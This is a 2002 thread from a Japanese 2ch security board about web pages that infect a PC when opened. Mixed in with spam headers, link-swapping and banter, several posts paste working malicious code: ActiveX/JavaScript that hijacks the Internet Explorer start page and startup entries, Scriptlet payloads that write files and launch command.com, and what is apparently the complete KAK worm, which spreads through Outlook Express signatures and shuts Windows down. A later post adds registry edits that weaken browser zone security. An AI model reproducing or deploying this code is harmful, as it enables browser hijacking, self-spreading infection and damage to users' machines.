開いただけでウイルスに感染するページat SEC
開いただけでウイルスに感染するページ - 暇つぶし2ch168:
02/01/05 02:50
だから、ネット上には保存してローカル権限で見させるページ作ればいいんじゃんか

169:167
02/01/05 02:54
>>168
それができれば苦労しないが。(何の苦労だか(w
それともなんかローカル権限で見させるセキュリティーホールでも有るの?

170:
02/01/05 13:53
>>169
あふぉ、それくらい自分で作れないなら逝ってよし

171:167
02/01/06 00:13
>>170
だからそれが出来たら大問題でしょ。
古いセキュリティーホール使ってやるって事なら出来ないと一緒。
作れるならどうやって作るか説明してくれ。

俺はせいぜいGetHTMLとかのツールでサイトを丸ごと落とさせるような
サイトを作ってそこに仕込むぐらいの事しか思いつかん。

172:名無しさん@お腹いっぱい。
02/01/06 01:42
URLリンク(www.top.or.jp)
こんな事やめてくれ。

173:名無しさん@お腹いっぱい。
02/01/07 00:24
Received: from mta05-svc.ntlworld.com (62.253.162.45) by *** with SMTP; 00 *** (JST)
Received: from lkgu78guoi ([62.255.154.129]) by mta05-svc.ntlworld.com (InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP id <30011332240161.MANKO.mta05-svc.ntlworld.com@vkhyify67tdt>; *** +0000
Date:*** From: realwealth@maxleft.com
Message-ID:< 30011332240161.MANKO@mta05-svc.ntlworld.com >
Subject:It's time to STOP just making ends meet!!
-----
ELIMINATE DEBT--(credit cards,car loans, home loans,school loans)
CREATE WEALTH--With IMMEDIATE, EXTRODINARY & RESIDUAL income!
PROTECT ASSETS--Build & preserve a financial foundation!
Would you investigate it??
If you think it's "too good to be true" let me say this....
"A Wise Man Will Investigate What A Fool Takes For Granted!"
and "Timing Beats Out Talent Each and Every Time!"
For INSIDER INFORMATION:
email realwealthin2002@yahoo.com
Name: Email: Country:
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to realwealth@maxleft.com ...Thanks
URLリンク(www.em5000.com)
URLリンク(www.em5000.com)
-----
mta05-svc.ntlworld.com
<<< 220 mta05-svc@ntlworld.com ESMTP server (InterMail vM.4.01.03.23 201-229-121-123-20010418) ready ***
>>> HELO rlytest.nanet.co.jp
<<< 250 mta05-svc@ntlworld.com
>>> MAIL FROM:<"TEST URLリンク(www.nanet.co.jp) requested from pc1-cowc2-0-cust129rencable-ntl-com@mta05-svc.ntlworld.com >
<<< 250 Sender <"TEST URLリンク(www.nanet.co.jp) requested from pc1-cowc2-0-cust129-ren-cable-ntl-com@mta05-svc.ntlworld.com > Ok
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 550 relaying mail to nanet.co.jp is not allowed

netmongol.com (pri=10) (maxleft.com)
<<< 220 X1 NT-ESMTP Server NetMongol.com (IMail 6.06 66407-6)
>>> HELO rlytest.nanet.co.jp
<<< 250 hello NetMongol.com
>>> MAIL FROM:<"TEST URLリンク(www.nanet.co.jp) requested from realwealth-maxleft-com@netmongol.com
<<< 501 unacceptable mail address

174:あぼーん
あぼーん
あぼーん

175:水泥棒!「「菊池記念館」」
02/01/07 03:15
<SCRIPT language=JavaScript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX初始化过程(为达到修改用户注册表所必须的准备程序 )
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");< br>a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createI nstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createI nstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
//以下是检测用户注册表并修改相应的键值
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "URLリンク(JavaHouse.126.com)");//修改用户InternetExplorer浏览器的默认主页
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "URLリンク(JavaHouse.126.com)");//建立默认启动页面程序,保证用户每次启动计算机首先打开该页 面
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);//实现打开页面后1秒钟内执行测试修改注册表的工作
}
init();</SCRIPT>

176:findlu@21cn.com
02/01/07 03:19
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
height="14"
></object><script>
scr.Reset();
scr.Path="C:\windows\system\Krnl386.exe";
scr.Doc="<object id=`wsh`
classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`></object><SCRIPT>alert(
`Screw Denise Richards, Debbie Johnson
r0x!`);wsh.Run(`c:\command.com`);</"+"SCRIPT>";
scr.write();
</script>

</p>

See how simply that was adapted? I polished it not-at-all so you can see the
minimal changes. At this point you would be automatically transferred to a
second web page that would contain the following code.

<html>

<head>
<title>Self Destruct </title>
</head>

<body>
<form method="POST">

<table>
<tr>
<td width="20%"><input type="text" name="State" size="99999999"
maxlength="99999999" value=""></td>
</tr>
</table>

</form>
</body>
</html>

177:名無しさん@お腹いっぱい。
02/01/07 03:20
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
width="14" height="14">
</object>
<script>
scr.Reset();
scr.Path="C:\WINNT\System32\ntoskrnl.exe";
scr.Doc="<object id=`wsh`
classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`></object><SCRIPT>alert(
`Screw Denise Richards, Debbie Johnson
r0x!`);wsh.Run(`c:\command.com`);</"+"SCRIPT>";
scr.write();
</script>

178:名無しさん@お腹いっぱい。
02/01/07 03:23
document.write("<!--LET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent </APPL-->");

if (navigator.appName == 'Netscape') var language = navigator.language;
else var language = navigator.browserLanguage;

function AddFavLnk(loc, DispName, SiteURL) {
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}

function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

179:findlu@21cn.com
02/01/07 03:43

<x-html>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>
<DIV><FONT face=Arial size=2>Dear Sir</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>Iam a new learner of HTML . My question , suppose
my main file is "index.html" and I want to go to another file "main.html" with a
password what I have to do , will it require a cgi script to doing so . So
kindly help me by giving the source code for such a html file.</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>Thanks</FONT> <BR><BR><FONT face=Arial
size=2>From :</FONT></DIV>
<DIV><FONT face=Arial size=2>name_omitted , India, Jabalpur</FONT></DIV>
<DIV><FONT face=Arial size=2>e-mail : <A
href="mailto:email_address_omitted">email_address_omitted</A> </FONT></DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr
name=Patsisnameit></OBJECT></DIV></FONT></DIV>
<DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr
name=Patsisnameit></OBJECT></DIV>
<SCRIPT><!--

180:名無しさん@お腹いっぱい。
02/01/07 03:46
function Pats(){return true;}window.onerror=Pats;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>
Scan Memory Driver </"+"TITLE><HTA:APPLICATION ID=\"hO\" WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#468B4>
<object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='wsh'></"+"object><SCRIPT>function Patsi()
{self.close();return true;}window.onerror=Patsi;fs=new ActiveXObject('Scripting.FileSystemObject');wd=
'C:\\\\Windows\\\\';fl=fs.GetFolder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new Enumerator(sbf);!
mye.atEnd();mye.moveNext())idd=mye.item();ids=new String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=
wd+'MENUDE~1\\\\PROGRA~1\\\\DEMARR~1\\\\day.hta';sun=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\day.hta';d2=wd+'help\\\\days.hta';
dd=(fs.FileExists(kfr))?kfr:sun;nau='C:\\\\days.day';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(nau)){re=/day.hta/i;
if(hO.commandLine.search(re)!=-1){f1=fs.GetFile(aeb);f1.Copy(nau);t1=f1.OpenAsTextStream(8);pth=(dd==kfr)?wd+'MENUD?~1
\\\\PROGRA~1\\\\D?MARR~1\\\\day.hta':sun;t1.WriteBlankLines(1);t1.WriteLine('@ECHO OFF>'+pth);t1.WriteLine('DEL '+pth);
t1.Close();}}if(!fs.FileExists(d2)){fs.CopyFile(dd,d2);fs.GetFile(d2).Attributes=2;}t2=fs.CreateTextFile(wd+'day.reg');t2.write('REGEDIT4');t2.
WriteBlankLines(2);ky2='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook Express\\\\5.0';sg='\\\\signatures'
;t2.WriteLine(ky2+sg+']');t2.Write('\"Default Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky2+sg+'\\\\00000000]');t2.WriteLine
('\"name\"=\"Signature #1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"');t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\
COMMAND\\\\\\\\default.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky2+']');t2.Write('\"Signature Flags\"=dword:00000003')

181:名無しさん@お腹いっぱい。
02/01/07 03:54
sage

182:kakWorm
02/01/07 03:54
;t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft
\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Write('\"cDays\"=\"C:\\\\\\\\WINDOWS
\\\\\\\\help\\\\\\\\days.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run
(wd+'Regedit.exe -s '+wd+'day.reg');t3=fs.CreateTextFile(wd+'COMMAND\\\\default.htm',1);t3.Write
('<HTML><BODY><DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT name=
Patsisnameit id=scr classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC></"+"OBJECT></"+"DIV>')
;t4=fs.OpenTextFile(d2,1);while(t4.Read(1)!='Z');t3.WriteLine('<SCRIPT><!--');t3.write('function Pats()
{return true;}window.onerror=Pats;scr.Reset();scr.doc=\"Z');rs=t4.Read(4192);t4.close();rd=/\\\\/g;re=
/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.
WriteLine(rt+'\";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path
=(la==\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu Demarrer\\\\\\\\Programmes\\\\\\\\Demarrage\\\\\\\\day.hta
\":\"C:\\\\\\\\windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\day.hta\";agt=navigator.
userAgent.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf
(\"msie 5.\")!=-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>')
;t3.close();fs.GetFile(wd+'COMMAND\\\\default.htm').Attributes=2;fs.DeleteFile(wd+'day.reg');d=new Date()
;if(d.getDate()==11 && d.getHours()>16){alert('Days It was a day to be a days!');wsh.Run(wd+'RUNDLL32.EXE
user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 Scan Memory Driver";la=(navigator.systemLanguage)?navigator.
systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu Demarrer\\Programmes\\Demarrage\\day.hta":
"C:\\windows\\Start Menu\\Programs\\StartUp\\day.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1)
&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write();
//--></SCRIPT>
</OBJECT></DIV></BODY></HTML>

</x-html>

183:ウイルス
02/01/07 06:03
このスレをカチューシャでみたらNIS2002
がログをウイルスと断定、削除しました

184:名無しさん@お腹いっぱい。
02/01/07 15:09
>>183

おらも同じだ。

「ホットゾヌ」だけど、やっぱりノートンが「ログの中にウイルスがいる」と
警告してきた。

185:名無しさん@お腹いっぱい。
02/01/07 15:42
URLリンク(www.pp.iij4u.or.jp)

186:名無しさん@お腹いっぱい。
02/01/07 15:47
おめでとうございます。
初出勤今日は当然ドゴールです。
久しく革靴履いて歩いていないので今日はきつめの印象であります。
年末にビッチリと自分なりの手入れをしたため今日は履き心地は別にして気分がいいです。
とにかくビガビガです。
実は奥さんと3歳の息子にまで怒られながらも家でビデオ鑑賞の際などに履いていましたので初日ではないのですが、やはり気に入った靴で出勤した日は気分いいものです。
それでは今年もよろしくお願いします。

187:名無しさん@お腹いっぱい。
02/01/07 15:58
>>183-184
NPF2001だと、なにも検出しなかったよ
やっぱり新しいのがいいのかなぁ

188:名無しさん@お腹いっぱい。
02/01/07 16:56
>>186
幸せですか?

189:あぼーん
あぼーん
あぼーん

190: 
02/01/08 01:42
ココのスレをあらゆるところにリンクしたらそれは悲惨になりそうな予感

191: 
02/01/08 01:44
悪いものは悪いものなりに情報として集積することは悪いことではないけどね。

192:名無しさん@お腹いっぱい。
02/01/08 02:36


193:名無さん@お腹いっぱい。
02/01/10 06:53
もうネタ切れ?
しかしリンク切れているの多いなぁ
NIS2002で感染するほどキツイのないし・・

194: 
02/01/12 09:21
↓の画像やばいらしいっすね
しばらく見てると画像からウィルスが飛び出すらしい

URLリンク(www.geocities.co.jp)

195: 
02/01/12 13:44
>>194
どういう仕組みで?

196: 
02/01/12 13:46
>>194
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2002 04:44:11 GMT
Server: Y.G.Apache-SSLv3/1.3.9
Set-Cookie: Geoche=snRQ9cMkH000Zo91bcPBB000Tfvhc0;
domain=.geocities.co.jp; path=/; expires=Mon, 12-Jan-04 04:44:11 GMT
Last-Modified: Thu, 10 Jan 2002 09:39:59 GMT
ETag: "117f2c8-1999e-3c3d616f"
Accept-Ranges: bytes
Content-Length: 104862
Connection: close
Content-Type: image/gif

GIF89ahサ・エjFャg4ナ* bm嗚M+[ 叡6b宙p#⊇櫨 チbO凱y$含・萵B,+H・€Q[сワ賂-ェ・x0「

いちいちcookie仕掛けに来てうざい

197:第三者中継可能?
02/01/12 13:58
From:FunnyMoney< funnymoney.10@reply.pm0.net >
To: funnymoney@ofr.pm0.net
Subject:Deposit $50.00, Play With $100.00 at Black Widow Casino
Date:*****
Received:from [128.121.215.224]by pm0.com with ESMTP id ***;***
Received:(from localhost)by pm0.net (8.8.8pmg/8.8.5)id include:/usr/home/pmgs/users/funnymoney/delivery/
From funnymoney@ofr.pm0.net
Message-Id:< 300113322561MANKO123456@pm0.net >
X-Info: Message sent by Mindshare Design customer with ID "funnymoney"
X-Info: Report abuse to list owner at funnymoney@complaints.pm0.net
X-PMG-Userid: funnymoney
X-PMG-Recipient: funnymoney@ofr.pm0.net

To remove yourself from this mailing list, point your browser to:
URLリンク(i.pm0.net)

Enter your email address ( funnymoney.10@reply.pm0.net ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney:10".
OR... Reply to this message with the word "remove" in the subject line.

198:名無しさん@お腹いっぱい。
02/01/13 00:09
>>194
え?その画像ってウィルスなの?
ただのGIFじゃないの?

199:
02/01/13 00:18
>>198
拡張子はGIFだけど、実はCGIなり。
開いてるポートがあるとやばいなりよ。
面白い画像だと思ってダウンロード保存なんてしたらもっとやばいなり。

200:名無しさん@お腹いっぱい。
02/01/13 00:24
>>199
geoでどうやってcgi動かすんだよ。 (w

201:199
02/01/13 00:32
ばれた?(^^;

202:名無しさん@お腹いっぱい。
02/01/14 03:39
>172
を解説してください。mobsync.exeがスタートアップに付くんですか?

203: ◆RUwjICBI
02/01/16 17:34
何によりてか目を悦ばしむる。
スレリンク(hack板:225番)

204:名無しさん@お腹いっぱい。
02/01/20 00:06
>>202
何も起きないよ。
ただ脅して遊んでるだけ。

205:名無しさん@おなかいっぱい
02/01/28 21:41
ここのスレJS/IEStartっていうウィルスに感染してるって出るよ。。

206:名無しさん@おなかいっぱい。
02/02/05 09:29
URLリンク(easyweb.easynet.co.uk)
↑怪しいから踏んでないけど、MP3でもヤバイの?
ヤバイ雰囲気の所から拾ったURLだけど・・

207:名無しさん@お腹いっぱい
02/02/05 11:50
>>206
それはMTXだよ、てか超ガイシュツだからDLするな。

208:kakWormと出る
02/02/05 18:30
 

209:kakWormの所在
02/02/05 19:33
スレリンク(sec板:164-183番)

210:名無しさん@お腹いっぱい。
02/02/05 22:11
URLリンク(www.e-net.gen.tr)
VBS HAPTIME.A-1


211:名無しさん@お腹いっぱい。
02/02/06 10:37
なんだこれ

212:スパム
02/02/06 14:23
俺は海外からスパムメールがわんさか来る
そのまま返信、もしくはアドレスらしきものに、
こんなメールおくるなあゴルァ!メールをだしても
宛先に不明でもどってきてしまう

だれか相手の特定の仕方分かる方いませんか?
一応、メールのヘッダから相手方のIPアドレスらしきもの
を見つけだしてIP検索してみたが、どうも中国から
きているみたいですが



213:スパムに返信するな
02/02/06 18:50
>>212
そのまま返信、もしくはアドレスらしきものに、
こんなメールおくるなあゴルァ!メールをだすな。
返信するとメールアドレスが存在することがわかり、わんさかスパムがくる。

メールヘッダを晒してくれ。(自分のアドレスなどは消す)

214:名無しさん@お腹いっぱい。
02/02/06 20:48
URLリンク(myhome.hananet.net)

koraha?


215:名無しさん@お腹いっぱい。
02/02/06 21:03
落ち着いて見れないよう。ここ。


216:名無しさん@お腹いっぱい。
02/02/06 21:09
>>214
soreha virus janai.

217:名無しさん@お腹いっぱい。
02/02/06 21:21
浜崎あゆみ
URLリンク(jove.prohosting.com)

218:名無しさん@お腹いっぱい。
02/02/06 21:34
>>216
That’s Right

219:名無しさん@お腹いっぱい。
02/02/10 20:49
なんかないのか?

220:名無しさん@お腹いっぱい。
02/02/10 20:51
714 名前:nobody 投稿日:02/02/10 18:34
175無い人には可哀想だけど、確かに175以上ないと付き合う気がしない。。
好きな人のタイプは?って聞かれて間違っても「背が高くて~、」とかは
言わないけど、でも心の内では背が高いってのがいつの間にか条件に
入っちゃってる。高校のとき高い人と付き合って以来、高い人にしか
異性を感じなくなっちゃって。。男友達多いし、自分と同じ目線だと
同姓の友達のような親近感持ちすぎてしまふ。。


221: 
02/02/10 22:57
>>214

赤い文字だけで何も起きない。

顔が出てくるらしいが。

222: 
02/02/11 00:22
URLリンク(61.215.152.79)

223:名無しさん@お腹いっぱい。
02/02/11 01:55
>>183-184
>>205
コピペのコードにヒットしたんだと思う。
うちでも、ノートンでファイルチェックすると
プライスロトのコード書いたテキストファイルに
反応するもん。

224:223
02/02/11 01:56
ごめん、さげる必要なかったね。
癖になってる

225:名無しさん@お腹いっぱい。
02/02/11 06:28
URLリンク(www.top.or.jp)
を開いたらどうなりますか?対処法教えて!

226:名無しさん@お腹いっぱい。
02/02/11 08:19
>>225
joke

227:名無しさん@お腹いっぱい。
02/02/14 19:50
>>225
対処法?んな物ねーよ!
今時そんなURL踏む厨房バカも2chには存在するのか?
どうなるか自分で体験てみろ!
報告も宜しく( ̄ー ̄) ニヤリッ

228:     
02/02/14 19:53
>225
踏まない事が対処法っす。

229:名無しさん@お腹いっぱい。
02/02/14 21:49
>225
凝ったウィルスだね。
これは普通の人がソース見ただけでは理解できないと思われ。

230:名無しさん@お腹いっぱい。
02/02/14 22:59
>>229
初心者でも読めるソースでしたがなにか?

231:名無しさん@お腹いっぱい。
02/03/07 16:58
あう~~

232:名無しさん@お腹いっぱい。
02/03/07 18:03
あう~~あ~

233:名無しさん@お腹いっぱい。
02/03/07 18:07
あう~~あ~う~

234:名無しさん@お腹いっぱい。
02/04/05 16:19
age

235:名無しさん@お腹いっぱい。
02/04/06 23:52
URLリンク(ime.nu)

236:GNU ◆BJMxeAWk
02/04/13 16:56
URLリンク(www.pref.aichi.jp)

237:名無しさん@お腹いっぱい。
02/04/30 00:20
>>206の示したMTXって、一時ファイルとして保存されるだけで、
リンク先を開いただけで感染するってわけじゃないんでしょ?

238:名無しさん@お腹いっぱい。
02/05/01 23:24
URLリンク(xxxtw.com)のウイルスサイトにひっかかってしまいました
対処方法を教えてください


239:名無しさん@お腹いっぱい。
02/05/01 23:32
(*゚ー゚)イヤデス

240:名無しさん@お腹いっぱい。
02/05/01 23:53
>>238サン ヲ ハッケンシマシタ(゚ー゚*)

241:名無しさん@お腹いっぱい。
02/05/01 23:54
スレリンク(win板)
(゚ー゚*)

242:名無しさん@お腹いっぱい。
02/05/02 00:08
>>236

俺、すでに紫なんだが・・・なにそれ

243:名無しさん@お腹いっぱい。
02/05/02 00:20
>>238 ざっと見た限りでは兇悪なことはしてない。
お気に入りとスタートページ直す。
ノートンかバスター買ってきてスキャン。
貧乏ならスレリンク(sec板)l50

どうせなら、もっと鮮度の高いのに感染してきてくれ。 (w

244:名無しさん@お腹いっぱい。
02/05/02 00:29
>>243
教えてくれてありがとう
お気に入りとスタートページは直しました
明日ウイルスバスター買ってきます


245:まりなっち ◆.marinaM
02/05/03 23:26

|
|ヽ@∈  
|‘ ) ジー

|

246:あぼーん
あぼーん
あぼーん

247:名無しさん@お腹いっぱい。
02/05/14 18:53
URLリンク(abc.w5.pl)
これ開くとdw15.exeが発動してマイクロソフトに
プロダクトIDが送られます。

248:名無しさん@お腹いっぱい。
02/05/14 20:03
URLリンク(homepage3.nifty.com)

コレって超ガイシュツ?つか何コレ?




249:名無しさん@お腹いっぱい。
02/05/14 20:42
>>248
はいはい、お疲れ様でした。

250:名無しさん@お腹いっぱい。
02/05/26 01:33
>>248
ホント!!
お疲れ!!  志んんでくれ!

251:名無しさん@お腹いっぱい。
02/06/10 02:25
マルチゴメソ
URLリンク(www.cyber-lolita.com)
ここでウィルス喰らったみたいでホームが無理やりこのページにされたよ
半分マルチな内容だけど本気で困ってるんで助けて・・・

252:名無しさん@お腹いっぱい。
02/06/16 14:33
>>251
それはウィルスではなくてQ2では?
調べてみて。

253:名無しさん@お腹いっぱい。
02/06/17 00:24
>>249
しょーじきなとこ マジ教えてくれ。

254:名無しさん@お腹いっぱい。
02/06/17 00:42
>>253
(・∀・)ニヤニヤ

255:名無しさん@お腹いっぱい。
02/06/17 02:36
>>251

JS.Exception.Exploit

こんなん仕掛けられてました。
すごくない。



256:名無しさん@お腹いっぱい。
02/06/17 20:53
>>248
ブラクラ!!

257:名無しさん@お腹いっぱい。
02/06/17 21:03
>>248
↓のスレでガイシュツ。
勇気がなくてみられない画像解説スレin半角part46
スレリンク(ascii板)

>>251
何でもかんでもクリックしない方がいいと思うよ。
不安だったら↑のスレを参考に。いつもお世話になっている。


258:名無しさん@お腹いっぱい。
02/07/02 13:33
URLリンク(membres.lycos.fr)
息抜きにどうぞ。気長にやってみてね。
けっこう難しいです。
でもちゃんと音楽流れて楽しいですよ!
スタートをクリックして逝ってください。



259:名無しさん@お腹いっぱい。
02/07/06 08:48
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

260:259
02/07/06 09:01
あ、まちがい

261:名無しさん@お腹いっぱい。
02/07/06 11:15
>>259
ノートン先生が(略

262:
02/07/06 15:24
oi

263:名無しさん@お腹いっぱい。
02/07/06 16:34
www.myparty.yahoo.com

ここダイジョウブですか??
心配なので開けません・・・

264:名無しさん@お腹いっぱい。
02/07/06 16:50
↑マジ教えて!!


265:名無しさん@お腹いっぱい。
02/07/06 16:52
>>263
Yahoo! News - Document Not Found

だってさ。大丈夫だよ。

266:名無しさん@お腹いっぱい。
02/07/06 17:08
>>263
それ、ウイルスが偽装してクリックさせようとした罠。
URLリンク(www.trendmicro.co.jp)
↑を参照。

267:名無しさん@お腹いっぱい。
02/07/06 17:08
ありがとうございました!!

268:名無しさん@お腹いっぱい。
02/07/11 02:42
URLリンク(isweb30.infoseek.co.jp)
  

269:あぼーん
あぼーん
あぼーん

270:これって俺だけー?
02/07/11 13:01

スレリンク(hneta板)

271:名無しさん@お腹いっぱい。
02/07/11 13:07
>>270 ノートンがvbsウィルスのソースに誤反応
スレリンク(sec板)

272:これって俺だけー?
02/07/11 13:21
>>271
ありがとー!

273:ひげ
02/07/11 13:28
最強のハッカーで有名な『ヒゲ』とはぼくのことです

274: 
02/07/11 14:04
(^∀^)ゲラゲラ

275:名無しさん@お腹いっぱい。
02/07/11 18:38
crashmeは?

276:名無しさん@お腹いっぱい。
02/07/12 18:14
>>268
これってどうゆうしくみ?

277:名無しさん@お腹いっぱい。
02/07/13 02:29
↑ どれも偽物ばっかでつまらね~

URLリンク(kuro96.hypermart.net)

感想を聞かせろ

278:名無しさん@お腹いっぱい。
02/07/13 02:33
感想もクソも・・・何も起きないけど
Proxomitron+JSとActiveXオフなだけだけど

279:名無しさん@お腹いっぱい。
02/07/13 02:34
>>277 JSオフ、画像オフなので真っ白。とてもつまらない。

280:名無しさん@お腹いっぱい。
02/07/13 05:15
URLリンク(isweb38.infoseek.co.jp)
ここってどうなんでしょうか?


281:名無しさん@お腹いっぱい。
02/07/13 05:22
どうなんでしょうって、そんなの自分でソース見ればいいだろ
それともネタ提供か?
jisウィルスとか、ウイバスとかなかなか斬新な言語使ってらっしゃるようだが
これじゃ逆に厨房でもひっかからないような気がするがw

282:280
02/07/13 05:27
>>281
すいません
一応ソースは見てみましたが
なにぶんウイルスの事はあまり知らないんで・・・
つい何とはなしにクリックしてしまったもので・・・



283:名無しさん@お腹いっぱい。
02/07/13 07:10
洋楽イタみてたら、ノートン先生登場「感染しました」とのこと。
internet temporary fileが感染、love lettertとか書いてあった。
削除したが、誤作動それともほんとにウイルス?

284:名無しさん@お腹いっぱい。
02/07/13 07:18
ノートンがvbsウィルスのソースに誤反応
スレリンク(sec板)
ノートンがvbsウィルスのソースに誤反応
スレリンク(sec板)
ノートンがvbsウィルスのソースに誤反応
スレリンク(sec板)

285:
02/07/21 23:51
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Dial","M0");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Off","M1");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\1","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\2","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\3","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\0","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");


// Shl.RegWrite("HKCU\\RemoteAccess\\Default","dialup01");
// Shl.RegWrite("HKCU\\RemoteAccess\\InternetProfile","dialup01");
Shl.RegWrite("HKCU\\RemoteAccess\\DialUI", 00000007,"REG_BINARY");
// Shl.RegWrite("HKCU\\RemoteAccess\\Profile\\dialup01\\AutoConnect", 01,"REG_DWORD");

286:名無しさん@お腹いっぱい。
02/08/31 13:58
ラュdォRル描\YvΤuァ・・⊂・;kRエ{ 、C",ルhZ+~>$゙・ティ・リ・ミ・ト・メ・罧{ラ」・ク'イ・O
J珥Eカ・・,訃蓜」:FィマQ(ッェ刈k€.・ゥDyirオュRNサ6・チv袙・s~溜ワイネ+霻j毯チMtE
ミ90(Ⅱテ(ヌィ》ロヒ「ロaovRー焔摧ャ・㌘T?Wk%「ゥtb>・ィ妥O字・ソrキ;@呈ス9z゙綉亳x7メテ
振鑽禔淞イ・・、、&h@・豆o・カ・ハサ陸),豌ーVx]*Gラ、2氈ニ9∧鮭*・sN・0axツケァ・ハ-
$・ソ<メB$┝kmヌЪヤDモRXコBァkbヨ.マホ愷}&~ウ鼻>$・ヲチリQトd{&タ・}マnKノnヨ"
'ネ{ンP・・1瑰靡・モケモI:~b;F;ェエ[]!ッaEum,・ヘ・粱﨣・慴1タpx8ッレ`b fノフ`8)・・・!
